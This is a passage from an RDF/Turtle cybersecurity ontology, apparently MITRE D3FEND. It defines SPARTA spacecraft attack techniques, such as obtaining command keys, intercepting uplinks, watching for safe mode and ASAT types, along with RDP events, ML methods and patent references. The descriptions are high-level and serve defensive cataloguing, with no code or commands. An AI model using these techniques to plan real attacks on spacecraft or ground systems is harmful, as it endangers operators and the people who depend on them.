rdfs:subClassOf d3f:RD-0002 ; skos:prefLabel "3rd Party Ground System" . d3f:RD-0002.03 a owl:Class ; rdfs:label "3rd-Party Spacecraft - SPARTA" ; d3f:attack-id "RD-0002.03" ; d3f:definition "Threat actors may compromise a 3rd-party spacecraft that has the capability to maneuver within close proximity to a target spacecraft. This technique enables historically lower-tier attackers the same capability as top tier nation-state actors without the initial development cost. Additionally, this technique complicates attribution of an attack. Since many of the commercial and military assets in space are tracked, and that information is publicly available, attackers can identify the location of space assets to infer the best positioning for intersecting orbits. Proximity operations support avoidance of the larger attenuation that would otherwise affect the signal when propagating long distances, or environmental circumstances that may present interference. Further, the compromised spacecraft may posses the capability to grapple target spacecraft once it has established the appropriate space rendezvous. If from a proximity / rendezvous perspective a threat actor has the ability to connect via docking interface or expose testing (i.e., JTAG port) once it has grappled the target spacecraft, they could perform various attacks depending on the access enabled via the physical connection." ; rdfs:seeAlso ; rdfs:subClassOf d3f:RD-0002 ; skos:prefLabel "3rd-Party Spacecraft" . d3f:RD-0003.01 a owl:Class ; rdfs:label "Exploit/Payload - SPARTA" ; d3f:attack-id "RD-0003.01" ; d3f:definition "Threat actors may buy, steal, or download exploits and payloads that can be used for future campaigns or to perpetuate other techniques. An exploit/payload takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on the victim spacecraft's hardware, software, and/or subsystems. Rather than develop their own, threat actors may find/modify exploits from online or purchase them from exploit vendors." ; rdfs:seeAlso ; rdfs:subClassOf d3f:RD-0003 ; skos:prefLabel "Exploit/Payload" . d3f:RD-0003.02 a owl:Class ; rdfs:label "Cryptographic Keys - SPARTA" ; d3f:attack-id "RD-0003.02" ; d3f:definition "Threat actors may obtain encryption keys as they are used for the main commanding of the target spacecraft or any of its subsystems/payloads. Once obtained, threat actors may use any number of means to command the spacecraft without needing to go through a legitimate channel. These keys may be obtained through reconnaissance of the ground system or retrieved from the victim spacecraft." ; rdfs:seeAlso ; rdfs:subClassOf d3f:RD-0003 ; skos:prefLabel "Cryptographic Keys" . d3f:RD-0004.01 a owl:Class ; rdfs:label "Identify/Select Delivery Mechanism - SPARTA" ; d3f:attack-id "RD-0004.01" ; d3f:definition "Threat actors may identify, select, and prepare a delivery mechanism in which to attack the space system (i.e., communicate with the victim spacecraft, deny the ground, etc.) to achieve their desired impact. This mechanism may be located on infrastructure that was previously purchased or rented by the threat actor or was otherwise compromised by them. The mechanism must include all aspects needed to communicate with the victim spacecraft, including ground antenna, converters, and amplifiers." ; rdfs:seeAlso ; rdfs:subClassOf d3f:RD-0004 ; skos:prefLabel "Identify/Select Delivery Mechanism" . d3f:RD-0004.02 a owl:Class ; rdfs:label "Upload Exploit/Payload - SPARTA" ; d3f:attack-id "RD-0004.02" ; d3f:definition "Threat actors may upload exploits and payloads to a third-party infrastructure that they have purchased or rented or stage it on an otherwise compromised ground station. Exploits and payloads would include files and commands to be uploaded to the victim spacecraft in order to conduct the threat actor's attack." ; rdfs:seeAlso ; rdfs:subClassOf d3f:RD-0004 ; skos:prefLabel "Upload Exploit/Payload" . d3f:RD-0005.01 a owl:Class ; rdfs:label "Launch Services - SPARTA" ; d3f:attack-id "RD-0005.01" ; d3f:definition "Threat actors may acquire launch capabilities through their own development or through space launch service providers (companies or organizations that specialize in launching payloads into space). Space launch service providers typically offer a range of services, including launch vehicle design, development, and manufacturing as well as payload integration and testing. These services are critical to the success of any space mission and require specialized expertise, advanced technology, and extensive infrastructure." ; rdfs:seeAlso ; rdfs:subClassOf d3f:RD-0005 ; skos:prefLabel "Launch Services" . d3f:RD-0005.02 a owl:Class ; rdfs:label "Non-Kinetic Physical ASAT - SPARTA" ; d3f:attack-id "RD-0005.02" ; d3f:definition """A non-kinetic physical ASAT attack is when a satellite is physically damaged without any direct contact. Non-kinetic physical attacks can be characterized into a few types: electromagnetic pulses, high-powered lasers, and high-powered microwaves. These attacks have medium possible attribution levels and often provide little evidence of success to the attacker.* *https://aerospace.csis.org/aerospace101/counterspace-weapons-101""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:RD-0005 ; skos:prefLabel "Non-Kinetic Physical ASAT" . d3f:RD-0005.03 a owl:Class ; rdfs:label "Kinetic Physical ASAT - SPARTA" ; d3f:attack-id "RD-0005.03" ; d3f:definition """Kinetic physical ASAT attacks attempt to damage or destroy space- or land-based space assets. They typically are organized into three categories: direct-ascent, co-orbital, and ground station attacks. The nature of these attacks makes them easier to attribute and allow for better confirmation of success on the part of the attacker. * *https://aerospace.csis.org/aerospace101/counterspace-weapons-101""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:RD-0005 ; skos:prefLabel "Kinetic Physical ASAT" . d3f:RD-0005.04 a owl:Class ; rdfs:label "Electronic ASAT - SPARTA" ; d3f:attack-id "RD-0005.04" ; d3f:definition """Rather than attempting to damage the physical components of space systems, electronic ASAT attacks target the means by which space systems transmit and receive data. Both jamming and spoofing are forms of electronic attack that can be difficult to attribute and only have temporary effects.* *https://aerospace.csis.org/aerospace101/counterspace-weapons-101""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:RD-0005 ; skos:prefLabel "Electronic ASAT" . d3f:RDPConnectResponseEvent a owl:Class ; rdfs:label "RDP Connect Response Event" ; d3f:definition "An event where an RDP server acknowledges a connection request, finalizing session parameters and confirming the transition to an interactive remote session." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:RDPConnectRequestEvent ], d3f:RDPEvent . d3f:RDPInitialResponseEvent a owl:Class ; rdfs:label "RDP Initial Response Event" ; d3f:definition "An event where an RDP server responds to an initial request from a client, presenting its supported capabilities and agreeing to proceed with session negotiation." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:RDPInitialRequestEvent ], d3f:RDPEvent . d3f:RDPTLSHandshakeEvent a owl:Class ; rdfs:label "RDP TLS Handshake Event" ; d3f:definition "An event representing the cryptographic exchange of keys and certificates between an RDP client and server to establish a secure communication channel. The handshake ensures encryption, integrity, and authentication for the session." ; rdfs:subClassOf d3f:RDPEvent . d3f:REC-0001.01 a owl:Class ; rdfs:label "Software Design - SPARTA" ; d3f:attack-id "REC-0001.01" ; d3f:definition "Threat actors may gather information about the victim spacecraft's internal software that can be used for future campaigns or to help perpetuate other techniques. Information (e.g. source code, binaries, etc.) about commercial, open-source, or custom developed software may include a variety of details such as types, versions, and memory maps. Leveraging this information threat actors may target vendors of operating systems, flight software, or open-source communities to embed backdoors or for performing reverse engineering research to support offensive cyber operations." ; rdfs:seeAlso ; rdfs:subClassOf d3f:REC-0001 ; skos:prefLabel "Software Design" . d3f:REC-0001.02 a owl:Class ; rdfs:label "Firmware - SPARTA" ; d3f:attack-id "REC-0001.02" ; d3f:definition "Threat actors may gather information about the victim spacecraft's firmware that can be used for future campaigns or to help perpetuate other techniques. Information about the firmware may include a variety of details such as type and versions on specific devices, which may be used to infer more information (ex. configuration, purpose, age/patch level, etc.). Leveraging this information threat actors may target firmware vendors to embed backdoors or for performing reverse engineering research to support offensive cyber operations." ; rdfs:seeAlso ; rdfs:subClassOf d3f:REC-0001 ; skos:prefLabel "Firmware" . d3f:REC-0001.03 a owl:Class ; rdfs:label "Cryptographic Algorithms - SPARTA" ; d3f:attack-id "REC-0001.03" ; d3f:definition "Threat actors may gather information about any cryptographic algorithms used on the victim spacecraft's that can be used for future campaigns or to help perpetuate other techniques. Information about the algorithms can include type and private keys. Threat actors may also obtain the authentication scheme (i.e., key/password/counter values) and leverage it to establish communications for commanding the target spacecraft or any of its subsystems. Some spacecraft only require authentication vice authentication and encryption, therefore once obtained, threat actors may use any number of means to command the spacecraft without needing to go through a legitimate channel. The authentication information may be obtained through reconnaissance of the ground system or retrieved from the victim spacecraft." ; rdfs:seeAlso ; rdfs:subClassOf d3f:REC-0001 ; skos:prefLabel "Cryptographic Algorithms" . d3f:REC-0001.04 a owl:Class ; rdfs:label "Data Bus - SPARTA" ; d3f:attack-id "REC-0001.04" ; d3f:definition """Threat actors may gather information about the data bus used within the victim spacecraft that can be used for future campaigns or to help perpetuate other techniques. Information about the data bus can include the make and model which could lead to more information (ex. protocol, purpose, controller, etc.), as well as locations/addresses of major subsystems residing on the bus. Threat actors may also gather information about the bus voltages of the victim spacecraft. This information can include optimal power levels, connectors, range, and transfer rate.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:REC-0001 ; skos:prefLabel "Data Bus" . d3f:REC-0001.05 a owl:Class ; rdfs:label "Thermal Control System - SPARTA" ; d3f:attack-id "REC-0001.05" ; d3f:definition "Threat actors may gather information about the thermal control system used with the victim spacecraft that can be used for future campaigns or to help perpetuate other techniques. Information gathered can include type, make/model, and varies analysis programs that monitor it." ; rdfs:seeAlso ; rdfs:subClassOf d3f:REC-0001 ; skos:prefLabel "Thermal Control System" . d3f:REC-0001.06 a owl:Class ; rdfs:label "Maneuver & Control - SPARTA" ; d3f:attack-id "REC-0001.06" ; d3f:definition "Threat actors may gather information about the station-keeping control systems within the victim spacecraft that can be used for future campaigns or to help perpetuate other techniques. Information gathered can include thruster types, propulsion types, attitude sensors, and data flows associated with the relevant subsystems." ; rdfs:seeAlso ; rdfs:subClassOf d3f:REC-0001 ; skos:prefLabel "Maneuver & Control" . d3f:REC-0001.07 a owl:Class ; rdfs:label "Payload - SPARTA" ; d3f:attack-id "REC-0001.07" ; d3f:definition "Threat actors may gather information about the type(s) of payloads hosted on the victim spacecraft. This information could include specific commands, make and model, and relevant software. Threat actors may also gather information about the location of the payload on the bus and internal routing as it pertains to commands within the payload itself." ; rdfs:seeAlso ; rdfs:subClassOf d3f:REC-0001 ; skos:prefLabel "Payload" . d3f:REC-0001.08 a owl:Class ; rdfs:label "Power - SPARTA" ; d3f:attack-id "REC-0001.08" ; d3f:definition "Threat actors may gather information about the power system used within the victim spacecraft. This information can include type, power intake, and internal algorithms. Threat actors may also gather information about the solar panel configurations such as positioning, automated tasks, and layout. Additionally, threat actors may gather information about the batteries used within the victim spacecraft. This information can include the type, quantity, storage capacity, make and model, and location." ; rdfs:seeAlso ; rdfs:subClassOf d3f:REC-0001 ; skos:prefLabel "Power" . d3f:REC-0001.09 a owl:Class ; rdfs:label "Fault Management - SPARTA" ; d3f:attack-id "REC-0001.09" ; d3f:definition "Threat actors may gather information about any fault management that may be present on the victim spacecraft. This information can help threat actors construct specific attacks that may put the spacecraft into a fault condition and potentially a more vulnerable state depending on the fault response." ; rdfs:seeAlso ; rdfs:subClassOf d3f:REC-0001 ; skos:prefLabel "Fault Management" . d3f:REC-0002.01 a owl:Class ; rdfs:label "Identifiers - SPARTA" ; d3f:attack-id "REC-0002.01" ; d3f:definition "Threat actors may gather information about the victim spacecraft's identity attributes that can be used for future campaigns or to help perpetuate other techniques. Information may include a variety of details such as the satellite catalog number, international designator, mission name, and more." ; rdfs:seeAlso ; rdfs:subClassOf d3f:REC-0002 ; skos:prefLabel "Identifiers" . d3f:REC-0002.02 a owl:Class ; rdfs:label "Organization - SPARTA" ; d3f:attack-id "REC-0002.02" ; d3f:definition "Threat actors may gather information about the victim spacecraft's associated organization(s) that can be used for future campaigns or to help perpetuate other techniques. Collection efforts may target the mission owner/operator in order to conduct further attacks against the organization, individual, or other interested parties. Threat actors may also seek information regarding the spacecraft's designer/builder, including physical locations, key employees, and roles and responsibilities as they pertain to the spacecraft, as well as information pertaining to the mission's end users/customers." ; rdfs:seeAlso ; rdfs:subClassOf d3f:REC-0002 ; skos:prefLabel "Organization" . d3f:REC-0002.03 a owl:Class ; rdfs:label "Operations - SPARTA" ; d3f:attack-id "REC-0002.03" ; d3f:definition "Threat actors may gather information about the victim spacecraft's operations that can be used for future campaigns or to help perpetuate other techniques. Collection efforts may target mission objectives, orbital parameters such as orbit slot and inclination, user guides and schedules, etc. Additionally, threat actors may seek information about constellation deployments and configurations where applicable." ; rdfs:seeAlso ; rdfs:subClassOf d3f:REC-0002 ; skos:prefLabel "Operations" . d3f:REC-0003.01 a owl:Class ; rdfs:label "Communications Equipment - SPARTA" ; d3f:attack-id "REC-0003.01" ; d3f:definition """Threat actors may gather information regarding the communications equipment and its configuration that will be used for communicating with the victim spacecraft. This includes: Antenna Shape: This information can help determine the range in which it can communicate, the power of it's transmission, and the receiving patterns. Antenna Configuration/Location: This information can include positioning, transmission frequency, wavelength, and timing. Telemetry Signal Type: Information can include timing, radio frequency wavelengths, and other information that can provide insight into the spacecraft's telemetry system. Beacon Frequency: This information can provide insight into where the spacecrafts located, what it's orbit is, and how long it can take to communicate with a ground station. Beacon Polarization: This information can help triangulate the spacecrafts it orbits the earth and determine how a satellite must be oriented in order to communicate with the victim spacecraft. Transponder: This could include the number of transponders per band, transponder translation factor, transponder mappings, power utilization, and/or saturation point.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:REC-0003 ; skos:prefLabel "Communications Equipment" . d3f:REC-0003.02 a owl:Class ; rdfs:label "Commanding Details - SPARTA" ; d3f:attack-id "REC-0003.02" ; d3f:definition """Threat actors may gather information regarding the commanding approach that will be used for communicating with the victim spacecraft. This includes: Commanding Signal Type: This can include timing, radio frequency wavelengths, and other information that can provide insight into the spacecraft's commanding system. Valid Commanding Patterns: Most commonly, this comes in the form of a command database, but can also include other means that provide information on valid commands and the communication protocols used by the victim spacecraft. Valid Commanding Periods: This information can provide insight into when a command will be accepted by the spacecraft and help the threat actor construct a viable attack campaign.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:REC-0003 ; skos:prefLabel "Commanding Details" . d3f:REC-0003.03 a owl:Class ; rdfs:label "Mission-Specific Channel Scanning - SPARTA" ; d3f:attack-id "REC-0003.03" ; d3f:definition "Threat actors may seek knowledge about mission-specific communication channels dedicated to a payload. Such channels could be managed by a different organization than the owner of the spacecraft itself." ; rdfs:seeAlso ; rdfs:subClassOf d3f:REC-0003 ; skos:prefLabel "Mission-Specific Channel Scanning" . d3f:REC-0003.04 a owl:Class ; rdfs:label "Valid Credentials - SPARTA" ; d3f:attack-id "REC-0003.04" ; d3f:definition "Threat actors may seek out valid credentials which can be utilized to facilitate several tactics throughout an attack. Credentials may include, but are not limited to: system service accounts, user accounts, maintenance accounts, cryptographic keys and other authentication mechanisms." ; rdfs:seeAlso ; rdfs:subClassOf d3f:REC-0003 ; skos:prefLabel "Valid Credentials" . d3f:REC-0004.01 a owl:Class ; rdfs:label "Flight Termination - SPARTA" ; d3f:attack-id "REC-0004.01" ; d3f:definition "Threat actor may obtain information regarding the vehicle's flight termination system. Threat actors may use this information to perform later attacks and target the vehicle's termination system to have desired impact on mission." ; rdfs:seeAlso ; rdfs:subClassOf d3f:REC-0004 ; skos:prefLabel "Flight Termination" . d3f:REC-0005.01 a owl:Class ; rdfs:label "Uplink Intercept Eavesdropping - SPARTA" ; d3f:attack-id "REC-0005.01" ; d3f:definition "Threat actors may capture the RF communications as it pertains to the uplink to the victim spacecraft. This information can contain commanding information that the threat actor can use to perform other attacks against the victim spacecraft." ; rdfs:seeAlso ; rdfs:subClassOf d3f:REC-0005 ; skos:prefLabel "Uplink Intercept Eavesdropping" . d3f:REC-0005.02 a owl:Class ; rdfs:label "Downlink Intercept - SPARTA" ; d3f:attack-id "REC-0005.02" ; d3f:definition "Threat actors may capture the RF communications as it pertains to the downlink of the victim spacecraft. This information can contain important telemetry such as onboard status and mission data." ; rdfs:seeAlso ; rdfs:subClassOf d3f:REC-0005 ; skos:prefLabel "Downlink Intercept" . d3f:REC-0005.03 a owl:Class ; rdfs:label "Proximity Operations - SPARTA" ; d3f:attack-id "REC-0005.03" ; d3f:definition "Threat actors may capture signals and/or network communications as they travel on-board the vehicle (i.e., EMSEC/TEMPEST), via RF, or terrestrial networks. This information can be decoded to determine commanding and telemetry protocols, command times, and other information that could be used for future attacks." ; rdfs:seeAlso ; rdfs:subClassOf d3f:REC-0005 ; skos:prefLabel "Proximity Operations" . d3f:REC-0005.04 a owl:Class ; rdfs:label "Active Scanning (RF/Optical) - SPARTA" ; d3f:attack-id "REC-0005.04" ; d3f:definition "Threat actors may interfere with the link by actively transmitting packets to activate the transmitter and induce a reply. The scan can be similar to a brute force attack, aiming to guess the used frequencies and protocols to obtain a reply." ; rdfs:seeAlso ; rdfs:subClassOf d3f:REC-0005 ; skos:prefLabel "Active Scanning (RF/Optical)" . d3f:REC-0006.01 a owl:Class ; rdfs:label "Development Environment - SPARTA" ; d3f:attack-id "REC-0006.01" ; d3f:definition "Threat actors may gather information regarding the development environment for the victim spacecraft's FSW. This information can include IDEs, configurations, source code, environment variables, source code repositories, code \"secrets\", and compiled binaries." ; rdfs:seeAlso ; rdfs:subClassOf d3f:REC-0006 ; skos:prefLabel "Development Environment" . d3f:REC-0006.02 a owl:Class ; rdfs:label "Security Testing Tools - SPARTA" ; d3f:attack-id "REC-0006.02" ; d3f:definition "Threat actors may gather information regarding how a victim spacecraft is tested in regards to the FSW. Understanding the testing approach including tools could identify gaps and vulnerabilities that could be discovered and exploited by a threat actor." ; rdfs:seeAlso ; rdfs:subClassOf d3f:REC-0006 ; skos:prefLabel "Security Testing Tools" . d3f:REC-0007 a owl:Class ; rdfs:label "Monitor for Safe-Mode Indicators - SPARTA" ; d3f:attack-id "REC-0007" ; d3f:definition "Threat actors may gather information regarding safe-mode indicators on the victim spacecraft. Safe-mode is when all non-essential systems are shut down and only essential functions within the spacecraft are active. During this mode, several commands are available to be processed that are not normally processed. Further, many protections may be disabled at this time." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTAReconnaissanceTechnique ; skos:prefLabel "Monitor for Safe-Mode Indicators" . d3f:REC-0008.01 a owl:Class ; rdfs:label "Hardware Recon - SPARTA" ; d3f:attack-id "REC-0008.01" ; d3f:definition "Threat actors may gather information that can be used to facilitate a future attack where they manipulate hardware components in the victim spacecraft prior to the customer receiving them in order to achieve data or system compromise. The threat actor can insert backdoors and give them a high level of control over the system when they modify the hardware or firmware in the supply chain. This would include ASIC and FPGA devices as well." ; rdfs:seeAlso ; rdfs:subClassOf d3f:REC-0008 ; skos:prefLabel "Hardware Recon" . d3f:REC-0008.02 a owl:Class ; rdfs:label "Software Recon - SPARTA" ; d3f:attack-id "REC-0008.02" ; d3f:definition "Threat actors may gather information relating to the mission's software supply chain in order to facilitate future attacks to achieve data or system compromise. This attack can take place in a number of ways, including manipulation of source code, manipulation of the update and/or distribution mechanism, or replacing compiled versions with a malicious one." ; rdfs:seeAlso ; rdfs:subClassOf d3f:REC-0008 ; skos:prefLabel "Software Recon" . d3f:REC-0008.03 a owl:Class ; rdfs:label "Known Vulnerabilities - SPARTA" ; d3f:attack-id "REC-0008.03" ; d3f:definition "Threat actors may gather information about vulnerabilities that can be used for future campaigns or to perpetuate other techniques. A vulnerability is a weakness in the victim spacecraft's hardware, subsystems, bus, or software that can, potentially, be exploited by a threat actor to cause unintended or unanticipated behavior to occur. During reconnaissance as threat actors identify the types/versions of software (i.e., COTS, open-source) being used, they will look for well-known vulnerabilities that could affect the spacecraft. Threat actors may find vulnerability information by searching leaked documents, vulnerability databases/scanners, compromising ground systems, and searching through online databases." ; rdfs:seeAlso ; rdfs:subClassOf d3f:REC-0008 ; skos:prefLabel "Known Vulnerabilities" . d3f:REC-0008.04 a owl:Class ; rdfs:label "Business Relationships - SPARTA" ; d3f:attack-id "REC-0008.04" ; d3f:definition "Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an mission’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors/sub-contractors, etc.) that have connected (and potentially elevated) network access or sensitive information. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources." ; rdfs:seeAlso ; rdfs:subClassOf d3f:REC-0008 ; skos:prefLabel "Business Relationships" . d3f:REC-0009 a owl:Class ; rdfs:label "Gather Mission Information - SPARTA" ; d3f:attack-id "REC-0009" ; d3f:definition """Threat actors may initially seek to gain an understanding of a target mission by gathering information commonly captured in a Concept of Operations (or similar) document and related artifacts. Information of interest includes, but is not limited to: - the needs, goals, and objectives of the system - system overview and key elements/instruments - modes of operations (including operational constraints) - proposed capabilities and the underlying science/technology used to provide capabilities (i.e., scientific papers, research studies, etc.) - physical and support environments""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTAReconnaissanceTechnique ; skos:prefLabel "Gather Mission Information" . d3f:ROM a owl:Class ; rdfs:label "ROM" ; d3f:definition "Read-only memory (ROM) is a type of non-volatile memory used in computers and other electronic devices. Data stored in ROM cannot be electronically modified after the manufacture of the memory device. Read-only memory is useful for storing software that is rarely changed during the life of the system, also known as firmware." ; d3f:synonym "Read-only Memory" ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:PrimaryStorage . d3f:RTSPServer a owl:Class ; rdfs:label "RTSP Server" ; d3f:definition "A streaming server that utilizes the real-time streaming protocol." ; rdfs:subClassOf d3f:NetworkAudioVisualStreamingResource . d3f:RadioModem a owl:Class ; rdfs:label "Radio Modem" ; d3f:definition "A radio modem provides the means to send digital data wirelessly. Radio modems are used to communicate by direct broadcast satellite, WiFi, WiMax, mobile phones, GPS, Bluetooth and NFC. Modern telecommunications and data networks also make extensive use of radio modems where long distance data links are required. Such systems are an important part of the PSTN, and are also in common use for high-speed computer network links to outlying areas where fiber optic is not economical." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:Modem . d3f:RandomForest a owl:Class, owl:NamedIndividual ; rdfs:label "Random Forest" ; d3f:d3fend-id "D3A-RF" ; d3f:definition "Random Forest is a ML method that combines several other ML methods. At its core, Random Forest is an ensemble method of multiple bootstrapped decision trees filled with training data and random feature selection." ; d3f:kb-article """## References Random forest. Wikipedia. [Link](https://en.wikipedia.org/wiki/Random_forest).""" ; rdfs:subClassOf d3f:BootstrapAggregating . d3f:RandomSplits a owl:Class, owl:NamedIndividual ; rdfs:label "Random Splits" ; d3f:d3fend-id "D3A-RS" ; d3f:definition "The dataset is repeatedly sampled with a random split of the data into train and test sets." ; d3f:kb-article """## References How to Create a Random Split Cross-Validation and Bagging Ensemble for Deep Learning in Keras."*Machine Learning Mastery*. [Link](https://machinelearningmastery.com/how-to-create-a-random-split-cross-validation-and-bagging-ensemble-for-deep-learning-in-keras/).""" ; rdfs:subClassOf d3f:ResamplingEnsemble . d3f:RangeMatching a owl:Class, owl:NamedIndividual ; rdfs:label "Range Matching" ; d3f:d3fend-id "D3A-RM" ; d3f:definition "Numeric Range Matching determines if a value lies with an interval of values (i.e., within the range of values.)" ; rdfs:subClassOf d3f:NumericPatternMatching . d3f:Reference-ApparatusForToProvideContentToAndQueryAReverseDomainNameSystemServer a d3f:PatentReference, owl:NamedIndividual ; rdfs:label "Reference - Apparatus for to provide content to and query a reverse domain name system server - Barrracuda Networks" ; d3f:has-link "https://patents.google.com/patent/US20100174829A1/en?oq=20100174829"^^xsd:anyURI ; d3f:kb-abstract "An apparatus is disclosed for to provide content to and query a reverse domain name system (DNS) server without depending on the kindness of domain name system registrars, registrants. DNS replies are observed by firewalls or filters, analyzed, and transmitted to a reverse domain name system server. An embodiment of the present invention can be within a DNS server or SMTP server." ; d3f:kb-author "Dean Danko" ; d3f:kb-mitre-analysis "This patent includes the description of a method of blocking email traffic from untrusted domains by analyzing the TCP/IP source IP addresses and blocking traffic for IPs whose reverse lookup response FQDN matches a denylist." ; d3f:kb-reference-title "Apparatus for to provide content to and query a reverse domain name system server" . d3f:Reference-BiometricChallenge-ResponseAuthentication-Accenture a d3f:PatentReference, owl:NamedIndividual ; rdfs:label "Reference - Biometric Challenge-Response Authentication - Accenture" ; d3f:has-link "https://www.patentguru.com/US2021110015A1"^^xsd:anyURI ; d3f:kb-abstract """Secret biometric responses to authentication challenges for MFA. Methods, systems, and apparatus, including computer programs encoded on computer storage media, for authenticating users based on a sequence of biometric authentication challenges. In one aspect, a process includes receiving a first image of the face of the user and processing the first image according to a first authentication process to determine whether the face of the user shown in the first image matches the face of an authorized user. A second authentication process including a sequence of biometric authentication challenges is identified. The sequence includes at least one facial expression challenge. The user is authenticated in response to determining that the first authentication process is satisfied based on the face of the user shown in the first image matching the face of the authorized user and the second authentication process is satisfied based on the user providing a valid biometric response to each biometric authentication challenge.""" ; d3f:kb-author "Ben McCarty, Ellie Daw" ; d3f:kb-mitre-analysis "MITRE Analysis was not found." ; d3f:kb-organization "Accenture" ; d3f:kb-reference-of d3f:Multi-factorAuthentication ; d3f:kb-reference-title "Biometric Challenge-Response Authentication" . d3f:Reference-CAR-2020-11-010%3ACMSTP_MITRE a d3f:ExternalKnowledgeBase, owl:NamedIndividual ; rdfs:label "Reference - CAR-2020-11-010: CMSTP - MITRE" ; d3f:has-link "https://car.mitre.org/analytics/CAR-2020-11-010/"^^xsd:anyURI ; d3f:kb-abstract "CMSTP.exe is the Microsoft Connection Manager Profile Installer, which can be leveraged to setup listeners that will receive and install malware from remote sources in trusted fashion. When CMSTP.exe is seen in combination with an external connection, it is a good indication of this TTP." ; d3f:kb-author "MITRE" ; d3f:kb-organization "MITRE" ; d3f:kb-reference-of d3f:ProcessSpawnAnalysis ; d3f:kb-reference-title "CAR-2020-11-010: CMSTP" . d3f:Reference-ControlLogix5570and5560Controllers a d3f:UserManualReference, owl:NamedIndividual ; rdfs:label "Reference - ControlLogix 5570 and 5560 Controllers" ; d3f:has-link "https://literature.rockwellautomation.com/idc/groups/literature/documents/um/1756-um001_-en-p.pdf"^^xsd:anyURI ; d3f:kb-abstract "There are five types of ControlLogix controllers available. These types include the following: Standard ControlLogix controllers, Extreme environment ControlLogix controllers, Armor™ ControlLogix controllers, Standard GuardLogix® controllers, Armor GuardLogix controllers. This manual explains how to use standard, extreme environment, and Armor ControlLogix controllers." ; d3f:kb-organization "Rockwell Automation" ; d3f:kb-reference-of d3f:DisableRemoteAccess ; d3f:kb-reference-title "ControlLogix 5570 and 5560 Controllers" . d3f:Reference-EmbeddingContextsForOn-lineThreatsIntoResponsePolicyZones-VerisignInc a d3f:PatentReference, owl:NamedIndividual ; rdfs:label "Reference - Embedding contexts for on-line threats into response policy zones - Verisign Inc" ; d3f:has-link "https://patents.google.com/patent/US10440059B1"^^xsd:anyURI ; d3f:kb-abstract """Hierarchical threat intelligence embedded in subdomain CNAMEs of a DNS denylist. In one embodiment, a response policy zone (RPZ) application generates an RPZ that includes contexts for the on-line threats that are associated with domain names. For a domain name that is associated with an on-line threat, the RPZ application determines a threat specification that describes a characteristic of the on-line threat. The RPZ application then generates an alias based on the domain name and the threat specification. Subsequently, the RPZ application generates a domain name system (DNS) resource record that maps the domain name to the alias, includes the resource record in the RPZ, and transmits the RPZ to a DNS name server that implements the RPZ. Upon receiving a DNS query associated with the domain name, the DNS name server generates a DNS response based on the alias. Because the domain name and the threat specification is reflected in the alias, the DNS response automatically provides a relevant context.""" ; d3f:kb-author "Ben McCarty" ; d3f:kb-mitre-analysis "MITRE Analysis was not found." ; d3f:kb-reference-of d3f:HierarchicalDomainDenylisting ; d3f:kb-reference-title "Embedding contexts for on-line threats into response policy zones" . d3f:Reference-FWTKDocumentation-Fwtk.org a d3f:TechniqueReference, owl:NamedIndividual ; rdfs:label "Reference - FWTK Documentation - fwtk.org" ; d3f:has-link "https://web.archive.org/web/20070510153306/http://www.fwtk.org/fwtk/docs/documentation.html#1.1"^^xsd:anyURI ; d3f:kb-abstract """In case you don't already know, FWTK stands for the FireW all Tool Kit. It is used as a base to create a secure firewall system. If you need good documentation, please read the source code. If you are not familiar with C or do not feel comfortable with performing the configuration and security verification yourself, then I would suggest that you purchase a commercial firewall from a vendor (such as TIS, Checkpoint, Raptor, etc.). A machine needs other tools to secure it, including, but hardly limited to, tools to check files (tripwire), audit tools (tiger/cops), secure access methods (kerberos/ssh), something to watch logs and machine states (swatch/watcher some to mind) and filtering and routing tools such as screend/ipfilterd/ipacl. Again, I would recommend that you do not proceed to build a production FWTK firewall unless you are familiar with UNIX security.""" ; d3f:kb-author "fwtk.org" ; d3f:kb-organization "fwtk.org" ; d3f:kb-reference-of d3f:InboundTrafficFiltering ; d3f:kb-reference-title "FWTK Documentation" . d3f:Reference-IdentificationOfVisualInternationalDomainNameCollisions-VerisignInc a d3f:PatentReference, owl:NamedIndividual ; rdfs:label "Reference - Identification of visual international domain name collisions - Verisign Inc" ; d3f:has-link "https://patents.google.com/patent/US10599836B2/en"^^xsd:anyURI ; d3f:kb-abstract """Fuzzy OCR to detect domain name homoglyph attacks. Various embodiments of the invention disclosed herein provide techniques for detecting a homograph attack. An IDN collision detection server retrieves a first domain name that includes a punycode element. The IDN collision detection server converts the first domain into a second domain name that includes a Unicode character corresponding to the punycode element. The IDN collision detection server converts the second domain name into an image. The IDN collision detection server performs one or more optical character recognition operations on the image to generate a textual string associated with the image. The IDN collision detection server determines that the textual string matches at least a portion of a third domain name.""" ; d3f:kb-author "Ben McCarty, Preston Zeh" ; d3f:kb-mitre-analysis "MITRE Analysis was not found." ; d3f:kb-organization "Verisign Inc" ; d3f:kb-reference-of d3f:HomoglyphDetection ; d3f:kb-reference-title "Identification of visual international domain name collisions" . d3f:Reference-IntroducingFirefoxNewSiteIsolationArchitecture a d3f:InternetArticleReference, owl:NamedIndividual ; rdfs:label "Reference - Introducing Firefox's new Site Isolation Architecture" ; d3f:has-link "https://hacks.mozilla.org/2021/05/introducing-firefox-new-site-isolation-security-architecture/"^^xsd:anyURI ; d3f:kb-abstract "" ; d3f:kb-author "Anny Gakhokidze" ; d3f:kb-mitre-analysis "" ; d3f:kb-organization "Mozilla Foundation" ; d3f:kb-reference-of d3f:Application-basedProcessIsolation ; d3f:kb-reference-title "Site Isolation Design Document" ; d3f:release-date "May 18, 2021" . d3f:Reference-Intrusion_and_misuse_deterrence_system_employing_a_virtual_network a d3f:PatentReference, owl:NamedIndividual ; rdfs:label "Reference - Intrusion and misuse 